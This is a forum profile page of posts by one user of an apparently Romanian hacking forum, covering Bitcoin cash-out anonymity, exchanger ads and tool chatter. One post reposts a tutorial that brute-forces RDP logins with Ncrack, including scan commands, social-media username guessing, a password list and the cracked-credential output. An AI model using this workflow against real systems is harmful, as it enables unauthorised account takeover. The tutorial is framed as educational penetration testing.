Jump to content

Eric

Active Members
  • Posts

    539
  • Joined

  • Last visited

  • Days Won

    4

Everything posted by Eric

  1. pai se duce dracu anonimitatea bitcoinului daca tu ajungi sa-ti lasi amprentele peste tot, nu numai ca au numele tau, dar acum au si amprente, tot tantamu asta cu anonimitatea tranzactiilor si intr-un final ajung sa imi ia amprentele ? ce rost mai are? nu isi au rostu discutiile astea aici...... Tema discutiei este protejarea identitatii atunci cand vrei sa faci exchange bitcoin in romania.
  2. Tind sa cred ca nu conteaza cum ii invarti online, ci cum ii scoti e problema. Tot la amprente si poze se rezuma. Te cauta dupa suma, data, ora, ip-uri si fac legatura cu persoana care a prelucrat aceleasi date online. @1337 exemple de mixere si exchangeri ?
  3. Nu am avut cand, probabil saptamana viitoare o sa-l testez si eu, nu-s prin zona. Totusi daca ajunge cineva primu la el, poate ne zice si noua cum stau la capitolul camere, securitate, etc... Daca e ATM care iti ia amprentele s-a dus dracu anonimitatea bitcoin. Am vazut pe net ca exista cateva atm-uri bitcoin care fac si chestia asta. Nu stiu daca este cazul si aici. Asteptam raspunsuri
  4. Vindeti Bitcoini De ce sa vindeti bitcoins, litecoins la Bitcoin Romania? 1) Plata se face in RON cash sau prin metodele online populare printre posesorii de bitcoins. 2) Un curs foarte competitiv. Lucram cu parteneri aflati in diferite colturi ale lumii. Barcelona, Vancouver (Canada), Los Angeles. 3) Avem sediul in Bucuresti pentru plata cash. 4) Suntem profesionisti cu experienta foarte mare in moneda virtuala bitcoin. 5) Serviciu excellent! 0760 43 10 63 BTCBestPrice@gmail.com WhatsApp: +34727722808 https://www.facebook.com/bitcoinromania Vindeti Bitcoini | Bitcoin RomaniaBitcoin Romania
  5. @wirtz exchange din perfectmoney-ul meu in paypal-ul tau, o sa iti intre 28$ pentru hosting, in functie de cat de repede se misca exchange-ul o sa iti intre si banii.
  6. am votat da, in speranta ca chiar o sa puneti lucruri interesante in sectiunea respectiva, cu toate ca nu am vazut persoane care sa intrebe prea multe lucruri despre chestiile astea pe aici.
  7. sunt interesat, ti-am trimis un pm . completeaza te rog si ce tipuri de plati accepti si durata de scriere minima a unui articol.
  8. Depinde de situatii, daca este o discutie tehnica nu isi are rostul, deoarece pot aparea probleme noi oricand. In cazul discutiilor off topic si a altor categorii sunt de acord. Cu toate ca nici aici nu este cazul, daca se abereaza mult sau se invie topicuri vechi, moderatorii isi fac treaba si le inchid imediat + ban-uri sau warn-uri. Intrebarea este: "Cum vezi tu sortarea topicurilor?"
  9. De aia trebuie sa ai un scoci lipit pe camera web in permanenta !
  10. Una din cele mai complete arhive. LocalRoots - All Exploits 2006 -2013 sursa: SecMads
  11. Eu am reusit sa fac executabilu mass in mai putin de 5 minute sa-mi salveze imaginile exact cum ai facut tu mai sus, inclusiv cu threads, totul in bash. Si sa va mai invat ceva? Cauta-ti un soft de linux ( ocr linux ) si iti cauta si text pe poze, nu le mai iei manual.
  12. Eu lucrez cu un ucrainian de incredere are cam cele mai mici fee-uri pe care le-am vazut + ca este serios. EXCHANGE: Fast reliable wu, mg, pm, wmz, bitcoin exchange!!! ICQ: 325109102
  13. Nu vreau sa stric combinatia, dar de ce ar platii cineva pentru o chestie free inventata cu ani in urma ? https://rstforums.com/forum/83948-vnc-snapshot-features-usage-vnc-snapshot-includes-all-standard-vnc-viewer.rst#post540321
  14. VNC Snapshot Features and Usage VNC Snapshot includes all standard VNC viewer options, except those that apply to the viewer's window. VNC Snapshot can only be used from the command line. It can be invoked in three ways: vncsnapshot options host:display JPEG-filename vncsnapshot options -listen local-display JPEG-filename vncsnapshot options -tunnel host:display JPEG-filename vncsnapshot options -via gateway host:display JPEG-filename -listen, -tunnel and -via options have not been tested on Windows systems. VNC Snapshot Testat de mine, merge ca uns !
  15. Vreme, Horoscop, Portcheck(on sau off), Nmap . Ii dai privat si el iti raspunde tot cu privat.
  16. nytro, esti de la sud ?
  17. Ai idee de ce ? Adica care a fost motivul ? De unde pana unde, noi ne mai recuperam datele de pe server, dar banii ?
  18. Adica l-a saltat garda ?
  19. imi dati si mie access pe canalu vostru ?
  20. Cine stie, poate el l-a prins si a vrut ca primu lui post sa fie de calitate
  21. mai lucreaza la mimica si la glume, n-ai reusit sa furi nici macar un zambet....
  22. DISCLAIMER All information provided are for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). Tools and techniques demonstrated may be potential damaging if used inappropriately. All characters and data written on this post are fictitious. The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such SSH and VNC are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we already tried all the available remote attacks with no luck. We tried also to ARP poisoning the LAN looking to get user names and passwords, without succeeding. From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on varius social networking websites. Those are the key IT staff: jessie tagle julio feagins hugh duchene darmella martis lakisha mcquain ted restrepo kelly missildine Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname. jtagle jfeagins hduchene dmartis lmcquain trestrepo kmissildine Software required: Linux machine, preferably Ubuntu. nmap and terminal server client, sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev About Ncrack Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet .Ncrack - High-speed network authentication cracker Installation wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz mkdir /usr/local/share/ncrack tar -xzf ncrack-0.4ALPHA.tar.gz cd ncrack-0.4ALPHA ./configure make checkinstall dpkg -i ncrack_0.4ALPHA-1_i386.deb Information gathering Let’s find out what hosts in a network are up, and save them to a text list. The regular expression will parse and extract only the ip addresses from the scan. Nmap ping scan, go no further than determining if host is online nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt Nmap fast scan with input from list of hosts/networks nmap -F -iL 192.168.56.0.txt Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST Nmap scan report for 192.168.56.10 Host is up (0.0017s latency). Not shown: 91 closed ports PORT STATE SERVICE 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1028/tcp open unknown 3389/tcp open ms-term-serv MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems) Nmap scan report for 192.168.56.101 Host is up (0.014s latency). Not shown: 96 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-term-serv MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems) Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds From the log we can see two machines with the microsoft terminal service port (3389) open, looking more in depth to the services available on the machine 192.168.56.10 we can assume that this machine might be the domain controller, and it’s worth trying to pwn it. At this point we need to create a file (my.usr) with the probable usernames previously gathered. vim my.usr jtagle jfeagins hduchene trestrepo kmissildine We need also a file (my.pwd) for the password, you can look on the internet for common passwords and wordlists. vim my.pwd somepassword passw0rd blahblah 12345678 iloveyou trustno1 At this point we run Ncrack against the 192.168.56.10 machine. ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1 Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1' rdp://192.168.56.10:3389 finished. Discovered credentials for rdp on 192.168.56.10 3389/tcp: 192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd' 192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah' 192.168.56.10 3389/tcp rdp: 'jtagle' '12345678' 192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou' 192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1' Ncrack done: 1 service scanned in 98.00 seconds. Probes sent: 51 | timed-out: 0 | prematurely-closed: 0 Ncrack finished. We can see from the Ncrack results that all the user names gathered are valid, and also we were able to crack the login credential since they were using some weak passwords. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out. source: http://bailey.st/blog/2011/05/12/remote-desktop-credentials-auditing-with-ncrack/
  23. Eu as face o lista cu cei carora le-am dat vps-uri in primul post si as lasa contul de paypal pentru o mica donatie in paypal, macar de o bere.
  24. foarte bine thetime, dupa mine ar trebuii mutat undeva la anunturi importante sau in alta parte decat rst power.
  25. nu te supara, dar nu prea are ce sa caute la rst power, isi avea locul la anunturi importante, sticky cel mai probabil...deoarece oferi un serviciu free. plus ca o sa se umple de offtopic....
×
×
  • Create New...